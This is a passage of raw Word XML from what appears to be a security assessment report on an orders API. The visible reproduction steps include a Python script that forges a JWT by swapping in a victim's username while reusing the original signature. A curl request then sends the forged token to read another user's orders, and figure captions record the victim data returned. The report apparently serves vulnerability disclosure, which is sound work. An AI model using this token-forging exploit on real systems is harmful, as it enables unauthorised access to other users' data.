    <w:p w14:paraId="5F04DCE4" w14:textId="77777777" w:rsidR="00576C3F" w:rsidRPr="00576C3F" w:rsidRDefault="00576C3F" w:rsidP="00576C3F">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00576C3F">
        <w:t>-H "content-type: application/json" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589B10A9" w14:textId="77777777" w:rsidR="00576C3F" w:rsidRPr="00576C3F" w:rsidRDefault="00576C3F" w:rsidP="00576C3F">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00576C3F">
        <w:t>-H "authorization: $TOKEN_B" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D317F0" w14:textId="4FDB0A92" w:rsidR="00576C3F" w:rsidRDefault="00576C3F" w:rsidP="00576C3F">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00576C3F">
        <w:t>--data-raw '{"action":"orders"}' | jq</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E744D85" w14:textId="77777777" w:rsidR="00576C3F" w:rsidRDefault="00576C3F" w:rsidP="00576C3F">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52DCA3B5" w14:textId="77777777" w:rsidR="00576C3F" w:rsidRPr="00576C3F" w:rsidRDefault="00576C3F" w:rsidP="00576C3F">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00576C3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output: Only User B orders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F55F083" w14:textId="77777777" w:rsidR="00576C3F" w:rsidRDefault="00576C3F" w:rsidP="00576C3F">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F5BD4D8" w14:textId="77777777" w:rsidR="00712B53" w:rsidRDefault="00712B53" w:rsidP="00576C3F">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41B3B696" w14:textId="77777777" w:rsidR="00712B53" w:rsidRPr="00514B52" w:rsidRDefault="00712B53" w:rsidP="00576C3F">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58E8B346" w14:textId="1B4AE3E6" w:rsidR="00514B52" w:rsidRDefault="00712B53" w:rsidP="00712B53">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00712B53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 4: Forge Token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2E34FD" w14:textId="77777777" w:rsidR="00712B53" w:rsidRPr="00712B53" w:rsidRDefault="00712B53" w:rsidP="00712B53">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00712B53">
        <w:t>export FAKE_AS_C="$(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB3C4E5" w14:textId="77777777" w:rsidR="00712B53" w:rsidRPr="00712B53" w:rsidRDefault="00712B53" w:rsidP="00712B53">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00712B53">
        <w:t>python3 - &lt;&lt;'PY'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D95701D" w14:textId="77777777" w:rsidR="00712B53" w:rsidRPr="00712B53" w:rsidRDefault="00712B53" w:rsidP="00712B53">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00712B53">
        <w:t>import os, json, base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FAEA18" w14:textId="77777777" w:rsidR="00712B53" w:rsidRPr="00712B53" w:rsidRDefault="00712B53" w:rsidP="00712B53">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00712B53">
        <w:t>t = os.environ["TOKEN_B"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF3613A" w14:textId="77777777" w:rsidR="00712B53" w:rsidRPr="00712B53" w:rsidRDefault="00712B53" w:rsidP="00712B53">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00712B53">
        <w:t>victim = os.environ["VICTIM_USER"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE5C4FC" w14:textId="77777777" w:rsidR="00712B53" w:rsidRPr="00712B53" w:rsidRDefault="00712B53" w:rsidP="00712B53">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CC2EC5D" w14:textId="77777777" w:rsidR="00712B53" w:rsidRPr="00712B53" w:rsidRDefault="00712B53" w:rsidP="00712B53">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00712B53">
        <w:t>h,p,s = t.split(".")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF26615" w14:textId="77777777" w:rsidR="00712B53" w:rsidRPr="00712B53" w:rsidRDefault="00712B53" w:rsidP="00712B53">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00712B53">
        <w:t>p += "=" * (-len(p) % 4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A42F33E" w14:textId="77777777" w:rsidR="00712B53" w:rsidRPr="00712B53" w:rsidRDefault="00712B53" w:rsidP="00712B53">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00712B53">
        <w:t>data = json.loads(base64.urlsafe_b64decode(p.encode()))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257A7388" w14:textId="77777777" w:rsidR="00712B53" w:rsidRPr="00712B53" w:rsidRDefault="00712B53" w:rsidP="00712B53">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65AEF25C" w14:textId="77777777" w:rsidR="00712B53" w:rsidRPr="00712B53" w:rsidRDefault="00712B53" w:rsidP="00712B53">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00712B53">
        <w:t>data["username"] = victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039497FB" w14:textId="77777777" w:rsidR="00712B53" w:rsidRPr="00712B53" w:rsidRDefault="00712B53" w:rsidP="00712B53">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00712B53">
        <w:t>data["sub"] = victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76972284" w14:textId="77777777" w:rsidR="00712B53" w:rsidRPr="00712B53" w:rsidRDefault="00712B53" w:rsidP="00712B53">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F1413D9" w14:textId="77777777" w:rsidR="00712B53" w:rsidRPr="00712B53" w:rsidRDefault="00712B53" w:rsidP="00712B53">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00712B53">
        <w:t>newp = base64.urlsafe_b64encode(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604A22E7" w14:textId="77777777" w:rsidR="00712B53" w:rsidRPr="00712B53" w:rsidRDefault="00712B53" w:rsidP="00712B53">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00712B53">
        <w:t>json.dumps(data, separators=(",",":")).encode()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1729E52B" w14:textId="77777777" w:rsidR="00712B53" w:rsidRPr="00712B53" w:rsidRDefault="00712B53" w:rsidP="00712B53">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00712B53">
        <w:t>).rstrip(b"=").decode()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D494FA7" w14:textId="77777777" w:rsidR="00712B53" w:rsidRPr="00712B53" w:rsidRDefault="00712B53" w:rsidP="00712B53">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="408199E0" w14:textId="77777777" w:rsidR="00712B53" w:rsidRPr="00712B53" w:rsidRDefault="00712B53" w:rsidP="00712B53">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00712B53">
        <w:t>print(f"{h}.{newp}.{s}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F908E8" w14:textId="77777777" w:rsidR="00712B53" w:rsidRPr="00712B53" w:rsidRDefault="00712B53" w:rsidP="00712B53">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00712B53">
        <w:t>PY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CDB954" w14:textId="5AD780A6" w:rsidR="00712B53" w:rsidRPr="00712B53" w:rsidRDefault="00712B53" w:rsidP="00712B53">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00712B53">
        <w:t>)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA55E56" w14:textId="77777777" w:rsidR="00712B53" w:rsidRDefault="00712B53" w:rsidP="00712B53">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32ECA52C" w14:textId="544EFDF5" w:rsidR="00B73AF3" w:rsidRDefault="00B73AF3" w:rsidP="00B73AF3">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B73AF3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 5: Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F56E9BE" w14:textId="77777777" w:rsidR="00B73AF3" w:rsidRPr="00B73AF3" w:rsidRDefault="00B73AF3" w:rsidP="00B73AF3">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00B73AF3">
        <w:t>curl -s "$API" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1451C4EA" w14:textId="77777777" w:rsidR="00B73AF3" w:rsidRPr="00B73AF3" w:rsidRDefault="00B73AF3" w:rsidP="00B73AF3">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00B73AF3">
        <w:t>-H "content-type: application/json" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFC02E7" w14:textId="77777777" w:rsidR="00B73AF3" w:rsidRPr="00B73AF3" w:rsidRDefault="00B73AF3" w:rsidP="00B73AF3">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00B73AF3">
        <w:t>-H "authorization: $FAKE_AS_C" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFDDA26" w14:textId="22080CBF" w:rsidR="00B73AF3" w:rsidRDefault="00B73AF3" w:rsidP="00B73AF3">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00B73AF3">
        <w:t>--data-raw '{"action":"orders"}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344F2929" w14:textId="77777777" w:rsidR="0075506F" w:rsidRPr="00B73AF3" w:rsidRDefault="0075506F" w:rsidP="00B73AF3">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16284B85" w14:textId="63FA8101" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00956299">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA72A1">
        <w:lastRenderedPageBreak/>
        <w:t>Evidence and Proof</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F45373" w14:textId="77777777" w:rsidR="00706843" w:rsidRDefault="000C6563" w:rsidP="00706843">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="78A97E0E" wp14:editId="6E1EDD1C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4213860</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1082040</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1485900" cy="1097280"/>
                <wp:effectExtent l="19050" t="19050" r="38100" b="45720"/>
                <wp:wrapNone/>
                <wp:docPr id="489493314" name="Rectangle 5"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1485900" cy="1097280"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="5715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B7C51F" id="Rectangle 5" o:spid="_x0000_s1026" style="position:absolute;margin-left:331.8pt;margin-top:85.2pt;width:117pt;height:86.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9RztgIAAOwFAAAOAAAAZHJzL2Uyb0RvYy54bWysVFtv0zAUfkfiP1h+Z2mrlm3V0qnaBSFN&#10;Y2JDe3Ydu4nk+BjbvfHr+eyk7Rg8MEQenGOf+3cuF5fb1rC18qEhW/LhyYAzZSVVjV2W/NvT7Ycz&#10;zkIUthKGrCr5TgV+OXv/7mLjpmpENZlKeQYjNkw3ruR1jG5aFEHWqhXhhJyyYGryrYi4+mVRebGB&#10;9dYUo8HgY7EhXzlPUoWA1+uOyWfZvtZKxi9aBxWZKTlii/n0+Vyks5hdiOnSC1c3sg9D/EMUrWgs&#10;nB5MXYso2Mo3v5lqG+kpkI4nktqCtG6kyjkgm+HgVTaPtXAq5wJwgjvAFP6fWXm/fnQPHjBsXJgG&#10;kCmLrfZt+iM+ts1g7Q5gqW1kEo/D8dnkfABMJXjDwfnp6CzDWRzVnQ/xk6KWJaLkHtXIIIn1XYhw&#10;CdG9SPJm6bYxJlfEWLYp+eR0OEkOBBpDGxFBtq4qebBLzoRZouNk9NlkINNUST0ZCn65uDKerQWq&#10;fnMzwJcKDXe/iCXf1yLUnVxmdf3gaWWrHEetRHVjKxZ3Ds1r0cI8BdaqijOj4D9RWTKKxvyNJIIw&#10;FrEc4c5U3BmVQjf2q9KsqTLqORfZJ9M1LaYKiOxbNxuDQhLUSP6Nur1K0lZ5Vt6of1DK/snGg37b&#10;WOoLkyZZHaohpFQ2jvpy6E5nD0cHQsJjQdXuwTNP3cAGJ28bVOtOhPggPCYUIGDrxC84tCGUhHqK&#10;s5r8jz+9J3kMDrioISYeffR9JTwqaj5bjNT5cDyG2Zgv48npCBf/krN4ybGr9orQXkPsNyczmeSj&#10;2ZPaU/uM5TRPXsESVsJ317H95Sp2RcV6k2o+z2JYC07EO/voZDKekE19+rR9Ft71gxQxg/e03w5i&#10;+mqeOtmkaWm+iqSbPGxHXHu8sVLyUPTrL+2sl/csdVzSs58AAAD//wMAUEsDBBQABgAIAAAAIQDa&#10;+27H4QAAAAsBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI9BTsMwEEX3SNzBGiR21KYpaRviVAhRREUl&#10;aMoB7NgkEfE4it003J5hBcuZ//TnTb6ZXMdGO4TWo4TbmQBmsfKmxVrCx3F7swIWokKjOo9WwrcN&#10;sCkuL3KVGX/Ggx3LWDMqwZApCU2MfcZ5qBrrVJj53iJln35wKtI41NwM6kzlruNzIVLuVIt0oVG9&#10;fWxs9VWenIRXXZa7p91Wm7eXd3E3Pu91v95LeX01PdwDi3aKfzD86pM6FOSk/QlNYJ2ENE1SQilY&#10;igUwIlbrJW20hGSRzIEXOf//Q/EDAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMA&#10;AAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YA&#10;AACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAiD/Uc7YC&#10;AADsBQAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEA2vtu&#10;x+EAAAALAQAADwAAAAAAAAAAAAAAAAAQBQAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAA&#10;AB4GAAAAAA==&#10;" filled="f" strokecolor="#e00" strokeweight="4.5pt">
                <v:stroke joinstyle="round"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="001C3229">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72CD3160" wp14:editId="1F1872DB">
            <wp:extent cx="5730240" cy="2903220"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="22793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0240" cy="2903220"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="29724045" w14:textId="1A7005EC" w:rsidR="001C3229" w:rsidRPr="00706843" w:rsidRDefault="00706843" w:rsidP="00706843">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00706843">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00706843">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00706843">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00706843">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00184249">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00706843">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00706843">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Authorization header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10949A6F" w14:textId="77777777" w:rsidR="004A150F" w:rsidRDefault="001C3229" w:rsidP="004A150F">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CFBAFF7" wp14:editId="5E3EC0EA">
            <wp:extent cx="5943600" cy="3472249"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="866460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472249"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4180E5C7" w14:textId="279BE95E" w:rsidR="00800261" w:rsidRPr="004A150F" w:rsidRDefault="004A150F" w:rsidP="004A150F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A150F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="004A150F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="004A150F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="004A150F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00184249">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="004A150F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="004A150F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="004A150F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>User</w:t>
      </w:r>
      <w:r w:rsidRPr="004A150F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> B orders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF768CD" w14:textId="77777777" w:rsidR="00E16056" w:rsidRDefault="00170B48" w:rsidP="00E16056">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38F1D39F" wp14:editId="4F3907AD">
            <wp:extent cx="5943600" cy="4528457"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="1915802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528457"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4192F0B2" w14:textId="074DF1D1" w:rsidR="00800261" w:rsidRPr="00E16056" w:rsidRDefault="00E16056" w:rsidP="00E16056">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E16056">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00E16056">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00E16056">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00E16056">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00184249">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00E16056">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00E16056">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Forged token response (User C data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CB9433" w14:textId="77777777" w:rsidR="00184249" w:rsidRDefault="001C3229" w:rsidP="00184249">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50138E7A" wp14:editId="51699474">
            <wp:extent cx="5943600" cy="3546987"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6537907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46987"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D899151" w14:textId="5C396CD4" w:rsidR="00BA72A1" w:rsidRPr="00184249" w:rsidRDefault="00184249" w:rsidP="00184249">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00184249">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00184249">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00184249">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00184249">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00184249">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00184249">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00184249">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: JSON output showing victim data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BD7068" w14:textId="77777777" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00BA72A1"/>
